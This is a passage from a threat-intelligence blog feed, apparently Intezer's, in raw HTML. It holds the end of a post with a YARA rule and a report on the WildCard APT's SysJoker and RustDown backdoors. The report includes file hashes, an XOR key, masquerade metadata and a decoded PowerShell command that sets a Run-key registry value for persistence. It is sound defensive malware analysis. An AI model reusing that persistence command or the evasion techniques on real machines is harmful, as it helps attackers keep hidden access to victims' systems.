&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# Join the characters to form the decoded string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;decoded_string&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&amp;#34;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;decoded_chars&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;decoded_string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;# The encoded hex value&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;encoded_value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;8E8E9F82899B9FC29F9598899FC28289&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;# Decode the value&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;decoded_value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;decode_hex_string&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encoded_value&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;# Print the decoded string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;Decoded Value:&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;decoded_value&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Appendix C: YARA&lt;span class="hx:absolute hx:-mt-20" id="appendix-c-yara"&gt;&lt;/span&gt;
&lt;a href="#appendix-c-yara" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;import &amp;#34;pe&amp;#34;
rule IMEEX_Framework
{
meta:
desc = &amp;#34;Detect IMEEX Framework&amp;#34;
author = &amp;#34;Intezer&amp;#34;
last_modified = &amp;#34;11-09-2024&amp;#34;
hash = &amp;#34;3e25798da0232d9039e570fb34d4bdccf7f082fa38b486a097d954f5f3debab3&amp;#34;
strings:
/*
The code that loads the string //Global\4B59AFCC
*/
$s1 = {C7????47006C00C7????6F006200C7????61006C00C7????5C00}
/*
The code that loads the string: &amp;#34;Software\Microsoft\IMEEX&amp;#34;
*/
$s2 = {C7????68 53006F00 C7????6C 66007400 C7????70 77006100 C7????74 72006500 C7????78 5C004D00 C7????7C 69006300 C7458072 006F00C7 45847300 6F00C745 88660074 00C7458C 5C004900 C745904D 004500C7 45944500 5800}
$a1 = &amp;#34;server finished&amp;#34; ascii wide
$a2 = &amp;#34;extended master secret&amp;#34; ascii wide
$a3 = &amp;#34;client finished&amp;#34; ascii wide
$a4 = &amp;#34;SRVRCLNT\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
$a5 = &amp;#34;key expansion&amp;#34; ascii wide
$a6 = &amp;#34;SeDebugPrivilege&amp;#34; ascii wide
$a7 = &amp;#34;AES-256-ECB&amp;#34; ascii wide
$a8 = &amp;#34;AES-256-CTR&amp;#34; ascii wide
$a9 = &amp;#34;AES-256-CBC&amp;#34; ascii wide
$a10 = {fb fd fc fe}
condition:
pe.is_dll() and pe.is_64bit() and (all of ($s*) or 80% of ($a*))
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>WildCard: The APT Behind SysJoker Targets Critical Sectors in Israel</title><link>https://research.intezer.com/blog/2023/11/wildcard-evolution-of-sysjoker-cyber-threat/</link><pubDate>Mon, 27 Nov 2023 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2023/11/wildcard-evolution-of-sysjoker-cyber-threat/</guid><description>
&lt;p&gt;&lt;em&gt;Our research team has identified a new APT group, dubbed &amp;ldquo;WildCard,&amp;rdquo; initially
detected through its use of the SysJoker malware, which targeted Israel&amp;rsquo;s
educational sector in 2021. WildCard has since expanded its reach, creating
sophisticated malware variants disguised as legitimate software, and a recently
developed malware called &amp;lsquo;RustDown,&amp;rsquo; written in Rust for potential operational
advantages. Connections to Operation ElectricPowder indicate WildCard&amp;rsquo;s
advanced capabilities with a focus on critical sectors within Israel. While
we&amp;rsquo;ve begun to understand WildCard&amp;rsquo;s tactics and methods, their precise
identity is still enigmatic, demanding deeper analysis and collaboration within
the infosec community.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The current war between Israel and Hamas has brought increased interest in a
variety of threats targeting Israel. Of course, this includes the usual
suspects like Iranian, Hezbollah, and Hamas-affiliated groups that consistently
target Israeli organizations and are likely to increase their operational tempo
to match the current conflict. &lt;strong&gt;We believe the shadow of a previously
unidentified threat actor has slipped below the threshold and deserves greater
attention.&lt;/strong&gt; Its first sighting began with our discovery of the
&lt;a href="../../../2022/01/new-backdoor-sysjoker"&gt;SysJoker malware&lt;/a&gt; targeting the
educational sector in Israel in 2021. Since then, the group behind SysJoker has
evolved its tooling and targeting in important ways.&lt;/p&gt;
&lt;p&gt;As we continued to track this threat cluster, we found previously undiscovered
2022 variants masquerading as &amp;lsquo;DMAdevice&amp;rsquo; and &amp;lsquo;AppMessagingRegistrar&amp;rsquo; software,
both also written in C++. They share code and behavior patterns with our
original discovery of SysJoker for Windows. Then in October 2023, we noticed a
new malware written in Rust that shares behavioral traits with SysJoker. The
developers refer to the malware as &amp;lsquo;RustDown&amp;rsquo;. The original version of SysJoker
was used to target Windows, macOS, and Linux machines, the migration to Rust
might be an attempt to simplify multi-platform targeting in addition to making
it harder to analyze.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ve also uncovered possible connections with ClearSky&amp;rsquo;s
&lt;a href="https://www.clearskysec.com/iec/"target="_blank" rel="noopener"&gt;Operation ElectricPowder&lt;/a&gt;. If proven, we see
an actor displaying worrying capabilities and intent primarily targeting
different critical sectors in Israel. To better describe the threat actor that
ties these 3-4 different sets of activity together, we are clustering these
sets of activity under the name WildCard. At this time, we can better describe
WildCard&amp;rsquo;s TTPs across multiple operations and variants, but attribution
remains elusive.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/11/wildcard-evolution-of-sysjoker-cyber-threat/images/fig1.png" title="Timeline of WildCard operations." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Timeline of WildCard operations.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Technical Analysis&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;The Original SysJoker Malware&lt;span class="hx:absolute hx:-mt-20" id="the-original-sysjoker-malware"&gt;&lt;/span&gt;
&lt;a href="#the-original-sysjoker-malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;In January 2022, we published our discovery of SysJoker, an unattributed
multi-platform backdoor leveraged against an educational institute in Israel.
SysJoker masqueraded as a system update and generated its command-and-control
by decoding a string retrieved from a text file hosted on GDrive. This dead
drop resolver method is a consistent theme in the WildCard threat actor&amp;rsquo;s
future operations, along with naming their malware after legitimate components.
Note that the development of C++ multi-platform backdoors is rare in the Middle
East and aroused further suspicion about the nature of the unidentified malware
developers.&lt;/p&gt;
&lt;h3&gt;Previously Undiscovered Variants Appear&lt;span class="hx:absolute hx:-mt-20" id="previously-undiscovered-variants-appear"&gt;&lt;/span&gt;
&lt;a href="#previously-undiscovered-variants-appear" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;After our publication, the WildCard threat actor continued to evolve their
malware, re-implementing some of the malware&amp;rsquo;s behaviors to avoid detection and
adding new capabilities. We found three samples of a malware variant written in
C++. Two named DMAdevice.exe and one named AppMessagingRegistrar.exe. These
variants were compiled five months after our original publication.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hash&lt;/th&gt;
&lt;th&gt;Compilation Timestamp&lt;/th&gt;
&lt;th&gt;Filename&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;e076e9893adb0c6d0c70cd7019a266d5fd02b429c01cfe51329b2318e9239836&lt;/td&gt;
&lt;td&gt;19 May 2022 18:07:42&lt;/td&gt;
&lt;td&gt;DMAdevice.exe&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6c8471e8c37e0a3d608184147f89d81d62f9442541a04d15d9ead0b3e0862d95&lt;/td&gt;
&lt;td&gt;19 May 2022 18:05:18&lt;/td&gt;
&lt;td&gt;DMAdevice.exe&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;67ddd2af9a8ca3f92bda17bd990e0f3c4ab1d9bea47333fe31205eede8ecc706&lt;/td&gt;
&lt;td&gt;19 Jun 2022 20:20:06&lt;/td&gt;
&lt;td&gt;AppMessagingRegistrar.exe&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h4&gt;DMAdevice&lt;span class="hx:absolute hx:-mt-20" id="dmadevice"&gt;&lt;/span&gt;
&lt;a href="#dmadevice" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Using Intezer Analyze we were able to
&lt;a href="https://analyze.intezer.com/files/e076e9893adb0c6d0c70cd7019a266d5fd02b429c01cfe51329b2318e9239836"target="_blank" rel="noopener"&gt;identify code reuse&lt;/a&gt;
between these samples and the original Windows SysJoker samples.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/11/wildcard-evolution-of-sysjoker-cyber-threat/images/fig2.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The structure of the main methods is largely similar, with some differences.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/11/wildcard-evolution-of-sysjoker-cyber-threat/images/fig3.png" title="Comparison between SysJoker and the DMAdevice variant." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Comparison between SysJoker and the DMAdevice variant.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Besides the shared code, the two DMAdevice variants share a unique string with
SysJoker, a custom alphabet:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghilmnopqrstuvmxyz&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Note the missing &amp;lsquo;jk&amp;rsquo; from the lowercase portion of the custom alphabet. This
is likely a minor slip on the part of the developers but one that has
consistently carried over into these newer variants.&lt;/p&gt;
&lt;p&gt;Previous versions of SysJoker used GDrive as a
&lt;a href="https://attack.mitre.org/techniques/T1102/001/"target="_blank" rel="noopener"&gt;dead drop resolver&lt;/a&gt;. The
retrieved file content is base64 decoded before it is decrypted using a
hardcoded RSA key as an XOR key. The decrypted data is the address of the
intended C2 server.&lt;/p&gt;
&lt;p&gt;The DMAdevice variant implements similar behavior but instead abuses OneDrive
as its dead drop resolver. Meaning that the threat actors retained the usage of
popular benign publicly-available services, unlikely to be blocked across the
network while keeping the ability to rotate the C2 as needed. The use of
OneDrive as a dead drop resolver continues into the RustDown variant.&lt;/p&gt;
&lt;p&gt;Interestingly, they have decided to remove the use of the RSA key but keep the
same scheme, replacing the key with a different string. In this case, after the
stack string is built up, the used XOR key is:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;QQL8VJUJMABL8H5YNRC9QNEOHA4I3QDAVWP5RY9L0HCGWZ4T7GTYQTCQTHTTN8RV6BMKT3AICZHOFQS8MTT&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/11/wildcard-evolution-of-sysjoker-cyber-threat/images/fig4.png" title="The XOR string being built on the stack." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;The XOR string being built on the stack.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The hardcoded User Agent string also changes, as follows:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;AppMessagingRegistrar&lt;span class="hx:absolute hx:-mt-20" id="appmessagingregistrar"&gt;&lt;/span&gt;
&lt;a href="#appmessagingregistrar" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;This variant was compiled after the DMAdevice version. While it also
&lt;a href="https://analyze.intezer.com/files/67ddd2af9a8ca3f92bda17bd990e0f3c4ab1d9bea47333fe31205eede8ecc706"target="_blank" rel="noopener"&gt;shares code&lt;/a&gt;
with SysJoker, this variant implements different capabilities. For example, it
uses multiple XOR keys to decode strings. This variant also uses different url
paths:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/api/update&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/api/register&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/api/library&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/api/requests&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However, similar to the other WildCard malware, it also uses OneDrive as a dead
drop resolver. Also similar, AppMessagingRegistrar is downloaded from a server
inside a ZIP file and is executed by a
&lt;a href="https://analyze.intezer.com/files/96dc31cf0f9e7e59b4e00627f9c7f7a8cac3b8f4338b27d713b0aaf6abacfe6f"target="_blank" rel="noopener"&gt;DLL file&lt;/a&gt;.
The DLL file masquerades as Brave Browser.&lt;/p&gt;
&lt;p&gt;Metadate of AppMessagingRegistrar executable:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;Company: Brave Browser
Product: Brave Browser (4.0.1.5)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;RustDown: WildCard learns Rust&lt;span class="hx:absolute hx:-mt-20" id="rustdown-wildcard-learns-rust"&gt;&lt;/span&gt;
&lt;a href="#rustdown-wildcard-learns-rust" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;In October 2023, we discovered a new malware written in Rust. The sample is a
32-bit Windows executable masquerading as a PHP framework component. While the
codebase is new, the malware consistently shares TTPs used by the WildCard
threat actor in both SysJoker and its variants. The name of the malware is
derived from the developers, as evidenced by a leftover PDB path:&lt;/p&gt;
&lt;p&gt;– &lt;code&gt;C:\Code\Rust\Rust\Down-Belal\target\release\deps\RustDown.pdb&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/11/wildcard-evolution-of-sysjoker-cyber-threat/images/fig5.png" title="RustDown PDB file path." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;RustDown PDB file path.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;According to the PDB file the malware developers refer to this component as
RustDown. Additionally, the term &amp;ldquo;Belal&amp;rdquo; in the folder path may be a
transliteration of the common Arabic first name &amp;lsquo;Bilal&amp;rsquo;. We treat this as a
low-confidence indicator towards the identity of one of the WildCard
developers.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hash&lt;/th&gt;
&lt;th&gt;Compilation Timestamp&lt;/th&gt;
&lt;th&gt;Filename&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;d4095f8b2fd0e6deb605baa1530c32336298afd026afc0f41030fa43371e3e72&lt;/td&gt;
&lt;td&gt;7 Aug 2023 10:43:32&lt;/td&gt;
&lt;td&gt;php-cgi.exe&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;a href="https://analyze.intezer.com/files/d4095f8b2fd0e6deb605baa1530c32336298afd026afc0f41030fa43371e3e72"target="_blank" rel="noopener"&gt;RustDown&lt;/a&gt;
is intended to look like a legitimate PHP executable named php-cgi.
&lt;a href="https://www.php.net/manual/en/install.unix.commandline.php"target="_blank" rel="noopener"&gt;PHP-CGI&lt;/a&gt; stands
for PHP Common Gateway Interface. Providing an important tool that allows PHP
to interact with a web server.&lt;/p&gt;
&lt;p&gt;Metadata of RustDown executable:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;Company: The PHP Group
Product: PHP (7.4.19)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;As the name suggests, RustDown is a backdoor written in Rust and compiled for
Windows operating systems. It uses OneDrive as a dead drop resolver.&lt;/p&gt;
&lt;p&gt;RustDown implements multiple calls to the Sleep API using randomly chosen time
durations, as seen in SysJoker.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/11/wildcard-evolution-of-sysjoker-cyber-threat/images/fig6.png" title="Function in RustDown that implements the Sleep functionality." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Function in RustDown that implements the Sleep functionality.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Next, the backdoor copies the executable to another location and sets up
persistence by using a PowerShell command. Both the path and the PowerShell
command are obfuscated in an attempt to evade detection. After decrypting the
strings, we see that the malware copies itself to the following location,
keeping with the theme of the legitimate PHP CGI tool:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Next, the malware decodes the PowerShell command that sets the registry value
for persistence:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;&amp;#34;powershell&amp;#34; -Command &amp;#34;$reg=[WMIClass]&amp;#39;ROOT\DEFAULT:StdRegProv&amp;#39;;$results=$reg.SetStringValue(&amp;#39;&amp;amp;H80000001&amp;#39;,&amp;#39;Software\Microsoft\Windows\CurrentVersion\Run&amp;#39;, &amp;#39;php-cgi&amp;#39;, &amp;#39;C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe&amp;#39;);&amp;#34;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The general mechanism for interacting with the Current User Hive involves using
the identifier &lt;code&gt;&amp;amp;H80000001&lt;/code&gt; as described
&lt;a href="https://tfl09.blogspot.com/2011/09/using-powershell-and-wmi-to-manage.html"target="_blank" rel="noopener"&gt;here&lt;/a&gt;.
However, the specific command string it uses appears to be unique and relates
to a separate campaign, referred to as
&lt;a href="https://www.clearskysec.com/iec/"target="_blank" rel="noopener"&gt;Operation Electric Powder&lt;/a&gt; described further
below.&lt;/p&gt;
&lt;h3&gt;Obfuscation&lt;span class="hx:absolute hx:-mt-20" id="obfuscation"&gt;&lt;/span&gt;
